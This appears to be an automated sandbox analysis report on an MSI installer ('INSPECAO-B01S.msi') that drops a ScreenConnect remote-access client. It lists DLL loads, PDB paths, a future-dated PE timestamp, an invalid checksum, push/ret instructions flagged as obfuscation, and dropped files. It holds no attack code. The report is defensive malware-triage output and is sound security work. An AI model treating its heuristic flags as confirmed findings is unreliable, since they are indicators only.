Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: INSPECAO-B01S.msi

Static file information: File size 8249344 > 1048576

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1697090286.000000000487E000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2943982681.000000001B052000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000550A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2940444279.0000000002100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940588071.0000000002182000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1723474974.0000000000EAD000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2945335092.000000001B292000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.000000000131B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: INSPECAO-B01S.msi, MSI15E7.tmp.1.dr, MSI1608.tmp.1.dr, MSI17AE.tmp.1.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr, 4c1433.rbs.1.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: INSPECAO-B01S.msi, MSIBC6.tmp.0.dr, 4c1434.msi.1.dr, 4c1432.msi.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.000000000553C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2940504221.0000000002142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr

Binary contains a suspicious time stamp

Source: ScreenConnect.Client.dll.1.dr

Static PE information: 0xFC256B87 [Sun Jan 20 22:19:51 2104 UTC]

PE file contains an invalid checksum

Source: MSIBC6.tmp.0.dr

Static PE information: real checksum: 0x2f213 should be: 0x111c03

PE file contains sections with non-standard names

Source: ScreenConnect.WindowsAuthenticationPackage.dll.1.dr	Static PE information: section name: _RDATA
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E38400 push es; ret	3_3_06E38410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E329A0 push es; ret	3_3_06E329B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377E8 push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E377EC push esp; ret	3_3_06E377E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_3_06E37F3C push es; ret	3_3_06E37F40
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C91F push eax; retf 0004h	6_2_0455C92A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455C90F push eax; retf 0004h	6_2_0455C91A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0455CA1F push ebx; retf 0004h	6_2_0455CA3A
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_04556AB5 push esp; iretd	6_2_04556AB9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD50 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572CD40 push eax; mov dword ptr [esp], ecx	6_2_0572CD51
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05725DE8 push eax; mov dword ptr [esp], ecx	6_2_05725E11
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9D0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572B9C0 push eax; mov dword ptr [esp], ecx	6_2_0572B9D1
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05B30F81 pushad ; ret	6_2_05B30F93
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05B30FE0 push esp; ret	6_2_05B30FF3
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F39061 push 08059E95h; retf	6_2_05F3906D
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F3BC2A push esp; retf	6_2_05F3BC31
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71C3FB push FFFFFFE8h; ret	7_2_00007FFD9B71C3F9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71C380 push FFFFFFE8h; ret	7_2_00007FFD9B71C3F9
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7212FB pushad ; retf	7_2_00007FFD9B721319
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B72131C pushad ; retf	7_2_00007FFD9B721319
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7225F2 pushad ; ret	7_2_00007FFD9B722619
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B712960 push 0000003Ch; iretd	7_2_00007FFD9B712964
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7148E8 push eax; retn 9B70h	7_2_00007FFD9B714879
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71B8BE push esp; iretd	7_2_00007FFD9B71B8C1

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
